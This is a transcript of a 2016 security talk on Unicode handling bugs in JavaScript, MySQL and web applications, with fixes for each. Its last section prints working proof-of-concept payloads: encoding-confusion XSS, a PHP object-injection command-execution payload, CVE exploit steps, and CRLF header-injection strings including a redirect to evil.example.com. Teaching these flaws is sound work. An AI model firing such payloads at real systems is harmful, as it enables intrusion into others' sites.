Hacking with Unicode in 2016

This presentation explores common mistakes made by programmers when dealing with Unicode support and character encodings on the Web. For each mistake, I explain how to fix/prevent it, but also how it could possibly be exploited.

#ruhrsec

Video: https://www.youtube.com/watch?v=HhIEDWmQS3w

Mathias Bynens

April 29, 2016

Transcript

  1. @mathias · #ruhrsec Hacking with Unicode

  2. @mathias

  3. What we’ll cover

    1. Unicode
    2. Encodings for Unicode
    3. Unicode in JavaScript
    4. Unicode in MySQL
    5. Hacking with Unicode
  4. 1. Unicode

  5. code point unique name symbol/glyph

  6. A LATIN CAPITAL LETTER A U+0041

  7. a LATIN SMALL LETTER A U+0061

  8. © COPYRIGHT SIGN U+00A9

  9. ☃ SNOWMAN U+2603

  10. 💩 PILE OF POO U+1F4A9

  11. U+000000 → U+10FFFF

  12. (0x10FFFF + 1) code points ↓ 17 planes, (0xFFFF + 1) code points each

  13. Unicode plane #1 U+0000 → U+FFFF Basic Multilingual Plane a.k.a. BMP
  14. Unicode planes #2-17 U+010000 → U+10FFFF supplementary planes astral planes
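Since every plane holds 0x10000 code points, the plane of a code point falls out of a single division. A minimal sketch; `getPlane` and `isAstral` are hypothetical helper names, not from the talk, and the index is zero-based (plane 0 is the BMP), whereas the slides count planes from #1:

```javascript
// Hypothetical helpers, not part of the talk.
// Each plane holds 0x10000 code points, so the zero-based plane index
// is the code point divided by 0x10000, rounded down.
function getPlane(codePoint) {
  if (!Number.isInteger(codePoint) || codePoint < 0 || codePoint > 0x10FFFF) {
    throw new RangeError('Not a Unicode code point: ' + codePoint);
  }
  return Math.floor(codePoint / 0x10000);
}

// Astral (supplementary) code points live outside plane 0.
function isAstral(codePoint) {
  return getPlane(codePoint) > 0;
}
```

For example, `getPlane(0x2603)` (SNOWMAN) is plane 0, while `getPlane(0x1F4A9)` (PILE OF POO) is plane 1.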

  15. 2. Encodings

  16. Number of bytes per code point

    Code point range       UTF-8  UTF-16  UTF-32  UTF-EBCDIC  GB 18030
    U+000000 – U+00007F    1      2       4       1           1
    U+000080 – U+00009F    2      2       4       1           2 or 4 (*)
    U+0000A0 – U+0003FF    2      2       4       2           2 or 4 (*)
    U+000400 – U+0007FF    2      2       4       3           2 or 4 (*)
    U+000800 – U+003FFF    3      2       4       3           2 or 4 (*)
    U+004000 – U+00FFFF    3      2       4       4           2 or 4 (*)
    U+010000 – U+03FFFF    4      4       4       4           4
    U+040000 – U+10FFFF    4      4       4       5           4

    (*) 2 for characters inherited from GB 2312/GBK (e.g. most Chinese characters); 4 for everything else
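The UTF-8 and UTF-16 columns of the table can be sketched as two small functions. The names `utf8ByteLength` and `utf16ByteLength` are hypothetical and the input is assumed to be a valid code point:

```javascript
// Hypothetical helpers mirroring the UTF-8 and UTF-16 columns of the table.
// Assumes `codePoint` is an integer in the range 0x0 to 0x10FFFF.
function utf8ByteLength(codePoint) {
  if (codePoint <= 0x7F) return 1;   // ASCII
  if (codePoint <= 0x7FF) return 2;
  if (codePoint <= 0xFFFF) return 3; // rest of the BMP
  return 4;                          // astral code points
}

function utf16ByteLength(codePoint) {
  // One 16-bit code unit for the BMP, a surrogate pair for everything else.
  return codePoint <= 0xFFFF ? 2 : 4;
}
```

In environments that provide `TextEncoder`, `new TextEncoder().encode(symbol).length` should agree with `utf8ByteLength` for any single well-formed symbol.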
  18. 3. Unicode in JavaScript https://mths.be/jsu

  19. Hexadecimal escape sequences

    >> '\x41\x42\x43'
    'ABC'
    >> '\xA9 Caf\xE9 XYZ'
    '© Café XYZ'

    can be used for U+0000 → U+00FF
  20. Unicode escape sequences

    >> '\u0041\u0042\u0043'
    'ABC'
    >> 'I \u2661 JavaScript!'
    'I ♡ JavaScript!'

    can be used for U+0000 → U+FFFF
  21. …what about astral code points?

  22. …what about 💩?* (*…and other, equally important astral symbols)

  23. 💩

  24. Unicode code point escapes (ES6)

    >> '\u{41}\u{42}\u{43}'
    'ABC'
    >> '\u{1F4A9}'
    '💩' // U+1F4A9

    can be used for U+000000 → U+10FFFF
  25. Surrogate pairs

    >> '\uD83D\uDCA9'
    '💩' // U+1F4A9

    can be used for U+010000 → U+10FFFF
  26. Surrogate pairs

    // for astral code points (> 0xFFFF)
    function getSurrogates(codePoint) {
      var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800;
      var low = (codePoint - 0x10000) % 0x400 + 0xDC00;
      return [ high, low ];
    }

    function getCodePoint(high, low) {
      var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000;
      return codePoint;
    }

    >> getSurrogates(0x1F4A9); // U+1F4A9 is 💩
    [ 0xD83D, 0xDCA9 ]
    >> getCodePoint(0xD83D, 0xDCA9);
    0x1F4A9

    https://mths.be/bed
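In ES6 environments the same conversions are available as built-ins, so the arithmetic above rarely needs to be written by hand. A short sketch using `String.fromCodePoint` and `String.prototype.codePointAt`; the variable names are illustrative only:

```javascript
// Build the string for U+1F4A9 from its code point (ES6).
const pileOfPoo = String.fromCodePoint(0x1F4A9);

// Internally it is still a surrogate pair: two 16-bit code units.
const codeUnits = [pileOfPoo.charCodeAt(0), pileOfPoo.charCodeAt(1)];

// codePointAt() reads the whole pair and returns the original code point.
const roundTripped = pileOfPoo.codePointAt(0);
```

Here `codeUnits` holds the same two values that `getSurrogates(0x1F4A9)` computes, and `roundTripped` matches `getCodePoint(0xD83D, 0xDCA9)`.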
  27. JavaScript string length

    >> 'A'.length // U+0041
    1
    >> 'A' == '\u0041'
    true
    >> 'B'.length // U+0042
    1
    >> 'B' == '\u0042'
    true
  28. String length ≠ char count

    >> '𝐀'.length // U+1D400
    2
    >> '𝐀' == '\uD835\uDC00'
    true
    >> '𝐁'.length // U+1D401
    2
    >> '𝐁' == '\uD835\uDC01'
    true
  30. String length ≠ char count

    >> '💩'.length // U+1F4A9
    2
    >> '💩' == '\uD83D\uDCA9'
    true

    insert obligatory “number two” joke here
  31. Real-world example

  35. String character count

    function countSymbols(string) {
      return punycode.ucs2.decode(string).length;
    }

    >> countSymbols('A') // U+0041
    1
    >> countSymbols('𝐀') // U+1D400
    1
    >> countSymbols('💩') // U+1F4A9
    1

    https://mths.be/punycode
  36. String character count (ES6)

    function countSymbols(string) {
      return Array.from(string).length;
    }

    >> countSymbols('A') // U+0041
    1
    >> countSymbols('𝐀') // U+1D400
    1
    >> countSymbols('💩') // U+1F4A9
    1
  37. String character count (ES6)

    function countSymbols(string) {
      return [...string].length;
    }

    >> countSymbols('A') // U+0041
    1
    >> countSymbols('𝐀') // U+1D400
    1
    >> countSymbols('💩') // U+1F4A9
    1
  38. JavaScript escape sequences http://mths.be/bmf

  40. If we’re being pedantic…

    // it’s actually even more complicated:
    >> 'mañana' == 'mañana' // U+00F1 vs. U+006E + U+0303
    false
    >> 'ma\xF1ana' == 'man\u0303ana'
    false
    >> 'ma\xF1ana'.length
    6
    >> 'man\u0303ana'.length
    7
  41. Unicode normalization (ES6)

    function countSymbolsPedantically(string) {
      // Unicode Normalization, NFC form:
      var normalized = string.normalize('NFC');
      // Account for astral symbols / surrogates:
      return Array.from(normalized).length;
    }

    >> countSymbolsPedantically('mañana') // U+00F1
    6
    >> countSymbolsPedantically('mañana') // U+006E + U+0303
    6

    http://git.io/unorm
  43. Perfect? Nope. → can be ‘fixed’ using epic regex-fu >>

    var zalgo = 'H ̹̙̦̮͉̩̗̗ ͧ̇̏̊̾ Eͨ͆͒̆ͮ̃ ͏̷̮̣̫̤̣ ̵̞̹̻ ̀̉̓ͬ͑͡ ͅ Cͯ̂͐ ͏̨̛͔̦̟͈̻ O ̜͎͍͙͚̬̝̣ ̽ͮ͐͗̀ͤ̍̀ ͢ M ̴̡̲̭͍͇̼̟̯̦ ̉̒͠ Ḛ̛̙̞̪̗ ͥ ͤͩ̾͑̔͐ ͅ Ṯ̴̷̷̗̼͍ ̿̿̓̽͐ H ̙̙ ̔̄ ͜ '; >> countSymbolsPedantically(zalgo) 116 // not 9
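The slides do not show the regex itself, so the following is only one possible reading of the “regex-fu” hint: strip every combining mark before counting. It assumes an engine with Unicode property escapes (`\p{M}`, ES2018), and `countSymbolsIgnoringMarks` is a hypothetical name:

```javascript
// Hypothetical helper: count symbols after dropping all combining marks.
// Requires Unicode property escapes (ES2018) and String#normalize (ES6).
function countSymbolsIgnoringMarks(string) {
  // Compose what can be composed, then remove any marks that are left over.
  const stripped = string.normalize('NFC').replace(/\p{M}+/gu, '');
  // Array.from() iterates by code point, so surrogate pairs count once.
  return Array.from(stripped).length;
}
```

This is good enough for Zalgo-style text, but it undercounts in scripts where marks carry meaning of their own, so treat it as a demonstration rather than a general-purpose character counter.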
  48. Reversing a string in JavaScript

    // naive solution
    function reverse(string) {
      return string.split('').reverse().join('');
    }

    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anãnam'
    >> reverse('💩') // U+1F4A9
    '��' // '\uDCA9\uD83D', the surrogate pair for 💩, in the wrong order
  49. “I put my thang down, flip it, and reverse it” (Missy ‘Misdemeanor’ Elliott, 2002)
  50. Reversing a string in JavaScript

    // Using the Esrever library
    var reverse = esrever.reverse;

    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anañam'
    >> reverse('💩') // U+1F4A9
    '💩'

    https://mths.be/esrever
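To illustrate the idea without the library, here is a rough sketch that reverses by “base symbol plus trailing combining marks” instead of by code unit. It is not how Esrever is implemented; `reverseSymbols` is a hypothetical name and the regex assumes Unicode property escapes (ES2018):

```javascript
// Hypothetical helper, not the Esrever implementation.
function reverseSymbols(string) {
  // With the `u` flag, \P{M} matches one whole code point (so a surrogate
  // pair stays together), and \p{M}* keeps its combining marks attached.
  // The second alternative catches marks that have no base symbol.
  const clusters = string.match(/\P{M}\p{M}*|\p{M}+/gu) || [];
  return clusters.reverse().join('');
}
```

For the decomposed `'man\u0303ana'` this keeps the tilde on the `n`, and for `'💩'` the surrogate pair comes back in its original order.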
  51. Iterate over all symbols in a string

    function getSymbols(string) {
      var length = string.length;
      var index = -1;
      var output = [];
      var character;
      var charCode;
      while (++index < length) {
        character = string.charAt(index);
        charCode = character.charCodeAt(0);
        if (charCode >= 0xD800 && charCode <= 0xDBFF) {
          // note: this doesn’t account for lone high surrogates
          output.push(character + string.charAt(++index));
        } else {
          output.push(character);
        }
      }
      return output;
    }

    var symbols = getSymbols('💩');
    symbols.forEach(function(symbol) {
      assert(symbol == '💩');
    });
  52. Iterate over all symbols in a string (ES6)

    for (const symbol of '💩') {
      assert(symbol == '💩');
    }
  53. This behavior affects other string methods, too.

  54. More string madness

    • String.fromCharCode
    • String#charAt
    • String#substring
    • String#slice
    • …anything that involves strings
    • oh, and regular expressions
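A few of these can be checked directly in a console. The sketch below only uses standard methods; the `observations` object is just a convenient way to collect the results:

```javascript
const astralSymbol = '\u{1F4A9}'; // 💩, stored as the pair \uD83D\uDCA9

const observations = {
  // charAt() and slice() work on code units and cut the pair in half.
  charAt: astralSymbol.charAt(0),
  slice: astralSymbol.slice(0, 1),
  // Without the `u` flag, `.` matches a single code unit only.
  dotWithoutUFlag: /^.$/.test(astralSymbol),
  // With the ES6 `u` flag, `.` matches a whole code point.
  dotWithUFlag: /^.$/u.test(astralSymbol),
  // codePointAt() is the code-point-aware counterpart of charCodeAt().
  charCodeAt: astralSymbol.charCodeAt(0),
  codePointAt: astralSymbol.codePointAt(0)
};
```

The first two entries come back as the lone high surrogate `'\uD83D'`, which is exactly the kind of broken string the later slides feed into UTF-8 encoders.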
  55. JavaScript has a Unicode problem https://mths.be/jsu

  56. 💩 The Pile of Poo Test™ https://mths.be/jsu

  57. 💩 is the new %00

  58. 4. Unicode in MySQL

  59. CREATE TABLE `table_name` (
      `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
      `column_name` VARCHAR(255) NOT NULL DEFAULT '',
      PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
  65. mysql> UPDATE table_name SET column_name = 'foo💩bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1  Changed: 1  Warnings: 1

    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level   | Code | Message                                    |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    |         |      | for column 'column_name' at row 1          |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)

    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo         |
    +-------------+
    1 row in set (0.00 sec)

    ✘
  66. MySQL’s ✌utf8✌

  67. ALTER TABLE `table_name`
      CONVERT TO CHARACTER SET utf8mb4
      COLLATE utf8mb4_unicode_ci;

    https://mths.be/utf8mb4
  70. mysql> UPDATE table_name SET column_name = 'foo💩bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1  Changed: 1  Warnings: 0

    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo💩bar    |
    +-------------+
    1 row in set (0.00 sec)

    ✔

    https://mths.be/utf8mb4
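Until a database has been migrated to utf8mb4, an application can at least detect input that a three-byte `utf8` column cannot hold. A minimal sketch, assuming the column only stores BMP symbols; `fitsInMysqlUtf8` is a hypothetical name, not a MySQL or library API:

```javascript
// Hypothetical pre-storage check: MySQL's legacy `utf8` stores at most
// three bytes per symbol, which covers the BMP but no astral symbols.
function fitsInMysqlUtf8(string) {
  // The `u` flag makes the character class range over whole code points.
  return !/[\u{10000}-\u{10FFFF}]/u.test(string);
}
```

Rejecting such input up front avoids the silent truncation shown above, although converting to utf8mb4 remains the actual fix.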
  71. 5. Hacking with Unicode

  72. http://mths.be/brk

  78. $ curl -sL https://mths.be/brk | hexdump -C | tail -n 19

    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert|
    000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script|
    000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    3c 73 → U+3C73 CJK UNIFIED IDEOGRAPH-3C73
    63 72 → U+6372 CJK UNIFIED IDEOGRAPH-6372
    69 70 → U+6970 CJK UNIFIED IDEOGRAPH-6970
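The annotations can be reproduced by pairing up the ASCII bytes of `<script>` as if they were 16-bit code units. A small sketch; the big-endian pairing is an assumption chosen to match the code points shown on the slides, and `decodeAsUtf16BE` is a hypothetical helper:

```javascript
// Hypothetical helper: read a byte array as big-endian 16-bit code units.
function decodeAsUtf16BE(bytes) {
  const units = [];
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    units.push((bytes[i] << 8) | bytes[i + 1]);
  }
  return units;
}

// The eight ASCII bytes of the injected opening tag: 3c 73 63 72 69 70 74 3e
const scriptTagBytes = Array.from('<script>', (ch) => ch.charCodeAt(0));
const misreadUnits = decodeAsUtf16BE(scriptTagBytes);
const misreadText = String.fromCharCode(...misreadUnits);
```

Read this way, the tag turns into four harmless-looking CJK ideographs, which is why an HTML filter working on the UTF-16 view of the page does not see any markup.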
  80. http://mths.be/brm ∀[U+3E00][U+3C00]script[U+3E00]alert(1)[U+3C00]/script[U+3E00]

  86. $ hexdump -C utf-32-xss.html

    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c

    00 00 22 00 → ∀ (U+2200 FOR ALL)
    00 00 3e 00 → U+3E00 CJK UNIFIED IDEOGRAPH-3E00
    00 00 3c 00 → U+3C00 CJK UNIFIED IDEOGRAPH-3C00
    00 00 00 73 → s (U+0073 LATIN SMALL LETTER S)
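To see why these particular code points were picked, encode the payload as UTF-32 and look at what is left once the null bytes are ignored. The sketch assumes big-endian UTF-32 (as in the hexdump) and a consumer that simply drops `0x00` bytes; that second assumption models the vulnerable behavior and is not taken from the slides. Both helper names are hypothetical:

```javascript
// Hypothetical helper: encode a string as big-endian UTF-32 bytes.
function encodeUtf32BE(string) {
  const bytes = [];
  for (const symbol of string) {
    const cp = symbol.codePointAt(0);
    bytes.push((cp >>> 24) & 0xFF, (cp >>> 16) & 0xFF, (cp >>> 8) & 0xFF, cp & 0xFF);
  }
  return bytes;
}

// Hypothetical model of a parser that skips null bytes and reads the rest as ASCII.
function dropNullBytes(bytes) {
  return String.fromCharCode(...bytes.filter((byte) => byte !== 0x00));
}

const utf32Payload = '\u2200\u3E00\u3C00script\u3E00alert(1)\u3C00/script\u3E00';
const utf32Bytes = encodeUtf32BE(utf32Payload);
const seenWithoutNulls = dropNullBytes(utf32Bytes);
```

The encoded payload is 0x6c bytes long, matching the final offset in the hexdump, and `seenWithoutNulls` is the familiar `"><script>alert(1)</script>`.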
  90. https://mths.be/brl OBAMA vs. ᴼᴮᴬᴹᴬ

  92. https://mths.be/bvf

  94. JavaScript vs. JSON

  95. <script>
    // <?php echo strip($userInput); ?>
    </script>

    <?php /* Note: `strip()` strips ASCII newlines and `</script`. */ ?>
  96. https://mths.be/brn

  99. <script>
    // <?php echo strip($userInput); ?>
    </script>

    foo[U+2028]alert('XSS')

    ✘

  100. JSON ∉ JavaScript

  101. var data = '"Hello\u2028"';
    // JSON-formatted data containing a string
    // containing an (unescaped!) Line Separator
    eval('(' + data + ')');
    // → SyntaxError: Unexpected token ILLEGAL
    JSON.parse(data);
    // → 'Hello\u2028'
  102. Always escape JSON-formatted data before passing it to a JavaScript

    parser. https://mths.be/jsesc
  103. https://mths.be/jsesc
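Without a library, the minimum needed for this particular problem is to escape U+2028 and U+2029 in the serialized output. A sketch under that narrow assumption; `escapeLineTerminators` is a hypothetical helper and covers far less than jsesc does:

```javascript
// Hypothetical helper: escape the two line terminators that are legal
// inside JSON strings but used to end a line in JavaScript source.
function escapeLineTerminators(json) {
  return json.replace(/[\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

const rawJson = JSON.stringify('foo\u2028');       // contains a raw U+2028
const safeJson = escapeLineTerminators(rawJson);   // contains \u2028 as text
```

Both strings parse back to the same value with `JSON.parse`, but only `safeJson` is free of raw line terminators when embedded in a script.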

  104. var data = 'foo\u2028';
    var serialized = JSON.stringify(data);
    // → '"foo\u2028"' (contains the raw, unescaped
    // Unicode symbol)
    var escaped = jsesc(data, { 'json': true });
    // → '"foo\\u2028"' (contains an escape sequence
    // for the Unicode symbol → safer)
    JSON.parse(serialized) == JSON.parse(escaped);
    // → true (both strings unserialize to the same value)

    https://mths.be/jsesc
  106. var string = String.fromCharCode(0xD800);
    // a string containing an (unescaped!) lone surrogate
    var data = JSON.stringify(string);
    // the same string as JSON-formatted data
    storeInDatabaseAsUtf8(data);
    // → error/crash
    sendOverWebSocketConnection(data);
    // → error/crash/DoS
  107. Always escape JSON-formatted data before passing it to a UTF-8

    encoder. https://mths.be/jsesc
  108. https://mths.be/jsesc
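A library-free sketch of the same idea: walk the JSON text by code unit and replace every surrogate that is not part of a valid pair with an escape sequence. `escapeLoneSurrogates` is a hypothetical helper name. Engines that implement ES2019 already do this inside `JSON.stringify`, so the helper mainly matters for older environments or for strings built by other means:

```javascript
// Hypothetical helper: escape lone surrogates so the result can be
// encoded as UTF-8 without errors. Valid surrogate pairs are kept as-is.
function escapeLoneSurrogates(string) {
  let output = '';
  for (let i = 0; i < string.length; i++) {
    const unit = string.charCodeAt(i);
    const isHigh = unit >= 0xD800 && unit <= 0xDBFF;
    const isLow = unit >= 0xDC00 && unit <= 0xDFFF;
    if (isHigh && i + 1 < string.length) {
      const next = string.charCodeAt(i + 1);
      if (next >= 0xDC00 && next <= 0xDFFF) {
        // A well-formed pair: copy both code units untouched.
        output += string[i] + string[i + 1];
        i++;
        continue;
      }
    }
    output += (isHigh || isLow)
      ? '\\u' + unit.toString(16).toUpperCase()
      : string[i];
  }
  return output;
}
```

Applied to the JSON text `'"foo\uD800"'`, the result contains the six characters `\uD800` instead of the raw code unit, and it still parses back to the original string.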

  109. var data = 'foo\uD800';
    var serialized = JSON.stringify(data);
    // → '"foo\uD800"' (contains the raw, unescaped
    // Unicode symbol)
    var escaped = jsesc(data, { 'json': true });
    // → '"foo\\uD800"' (contains an escape sequence
    // for the Unicode symbol → safer)
    JSON.parse(serialized) == JSON.parse(escaped);
    // → true (both strings unserialize to the same value)

    https://mths.be/jsesc
  111. Phabricator

  115. uses MySQL

  116. uses MySQL’s ✌utf8✌

  119. https://mths.be/bro

  120. RCE in WordPress < 3.6.1 https://mths.be/brq

  121. CVE-2013-4338 “wp-includes/functions.php in WordPress before 3.6.1 does not properly determine

    whether data has been serialize()d, which allows remote attackers to execute arbitrary code by triggering erroneous PHP unserialize() operations.” https://mths.be/brq
  122. function is_serialized( $data ) {
      $data = trim( $data );
      $length = strlen( $data );
      $lastc = $data[$length - 1];
      if ( ';' !== $lastc && '}' !== $lastc )
        return false;
      $token = $data[0];
      switch ( $token ) {
        case 's' :
          if ( '"' !== $data[$length - 2] )
            return false;
        case 'a' :
        case 'O' :
          return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
        case 'b' :
        case 'i' :
        case 'd' :
          return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/", $data );
      }
      return false;
    }

    https://mths.be/brq
  125. WordPress (uses MySQL’s ✌utf8✌)

    Before writing it to the database, data gets serialized only if it’s an array or an object, or if is_serialized($data) returns true (double serialization).
    After retrieving data from the database, it gets unserialized only if is_serialized($data) returns true.

    https://mths.be/brq
  126. http://mths.be/brq

  128. class Foo {
      private $command;
      public function setCommand($command) {
        $this->command = $command;
      }
      public function __destruct() {
        if ($this->command) {
          shell_exec($this->command);
        }
      }
    }

    $object = new Foo();
    $object->setCommand('echo "pwned!" > /tmp/pwned.txt');
    $serialized = serialize($object);
    $payload = $serialized . '💩';

    https://mths.be/brq
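The trailing 💩 is what makes the payload change shape between the write and the read. Before storage the value ends in 💩, so the last-character check in `is_serialized()` fails and nothing gets double-serialized; after the ✌utf8✌ column has cut the value off at the astral symbol, it ends in `}` and passes the same check. The truncation step can be modelled as follows, assuming the non-strict behavior shown in the earlier MySQL slides. `simulateUtf8Truncation` is a hypothetical name and the serialized string is a made-up placeholder, not real exploit output:

```javascript
// Hypothetical model of MySQL's legacy `utf8` in non-strict mode:
// everything from the first astral symbol onwards is silently dropped.
function simulateUtf8Truncation(string) {
  const match = /[\u{10000}-\u{10FFFF}]/u.exec(string);
  return match ? string.slice(0, match.index) : string;
}

// Placeholder standing in for serialize($object) . '💩'
const submittedValue = 'O:3:"Foo":0:{}\u{1F4A9}';
const storedValue = simulateUtf8Truncation(submittedValue);

// The last character is what is_serialized() looks at first.
const lastBefore = Array.from(submittedValue).pop(); // the astral symbol
const lastAfter = Array.from(storedValue).pop();     // the closing brace
```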
  129. https://mths.be/brq

  130. RCE in Joomla < 3.4.6 https://mths.be/bvg

  131. CVE-2015-8562 “Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote

    attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.” https://mths.be/bvg
  132. Exploit https://mths.be/bvh

    1. Serialize a specially-crafted object containing PHP code to be executed
    2. Use that as HTTP User-Agent header value, with 💩 as suffix
  133. XSS in WordPress < 4.1.2 https://mths.be/buj

  137. Exploit: post comment https://mths.be/buj

    foo <q cite='x onmouseover=alert(1) 💩'>

    This is safe HTML (no XSS). While saving to the ✌utf8✌ MySQL database, it gets truncated, so we get:

    foo <q cite=&#8220;x onmouseover=alert(1) … >
  138. https://mths.be/buj

  139. TweetDeck

  143. function getTweetHtml(tweet) {
      var htmlEscapedTweet = htmlEscape(tweet);
      if (containsEmoji(htmlEscapedTweet)) {
        return replaceSymbolsWithImgTags(
          AccidentallyUndoHtmlEscaping(htmlEscapedTweet)
        );
      } else {
        return htmlEscapedTweet;
      }
    }

    https://mths.be/bsq
  144. Twitter

  145. https://mths.be/bsq https://mths.be/buh

  147. https://mths.be/buh Broken CRLF filtering

    symbol                             LF + CR
    code point                         U+000A U+000D
    URL-encoded (note: uses UTF-8!)    %0A%0D
    decoded (raw bytes)                [ 0x0A, 0x0D ]
    ✘
  148. https://mths.be/buh Bypass part 1: LF (U+000A)

    symbol                             嘊
    code point                         U+560A
    URL-encoded (note: uses UTF-8!)    %E5%98%8A
    decoded (raw bytes)                [ 0x56, 0x0A ]
  149. https://mths.be/buh Bypass part 2: CR (U+000D)

    symbol                             嘍
    code point                         U+560D
    URL-encoded (note: uses UTF-8!)    %E5%98%8D
    decoded (raw bytes)                [ 0x56, 0x0D ]
  150. https://mths.be/buh Example exploit %E5%98%8A%E5%98%8DSet-Cookie:%20test
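The bypass can be replayed in a few lines. The sketch assumes the vulnerable component keeps only the low byte of each code point after decoding, which is how the “decoded (raw bytes)” rows above are read here; `keepLowByteOnly` is a hypothetical stand-in for that component:

```javascript
// Hypothetical model of the broken decoding step: each code point is
// reduced to its lowest byte, so U+560A becomes 0x0A and U+560D becomes 0x0D.
function keepLowByteOnly(string) {
  return Array.from(string, (symbol) =>
    String.fromCharCode(symbol.codePointAt(0) & 0xFF)).join('');
}

const exploitParameter = '%E5%98%8A%E5%98%8DSet-Cookie:%20test';
const urlDecoded = decodeURIComponent(exploitParameter);
// No U+000A or U+000D in sight, so a filter for those two passes it through.
const passesCrlfFilter = !/[\r\n]/.test(urlDecoded);
// After the lossy conversion the line breaks appear in the header.
const headerValue = keepLowByteOnly(urlDecoded);
```

`headerValue` starts with a line feed and a carriage return followed by `Set-Cookie: test`, which is enough to inject a new response header.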

  152. https://mths.be/bve

  155. https://mths.be/bve Bypass part 1: LF (U+000A)

    symbol                             嘊
    code point                         U+560A
    URL-encoded (note: uses UTF-8!)    %E5%98%8A
    decoded (raw bytes)                [ 0x56, 0x0A ]
  156. https://mths.be/bve Bypass part 2: CR (U+000D)

    symbol                             嘍
    code point                         U+560D
    URL-encoded (note: uses UTF-8!)    %E5%98%8D
    decoded (raw bytes)                [ 0x56, 0x0D ]
  157. https://mths.be/bve Example exploit %E5%98%8A%E5%98%8DLocation:%20https:%2F%2Fevil.example.com%2F

  158. Thanks! Questions? → @mathias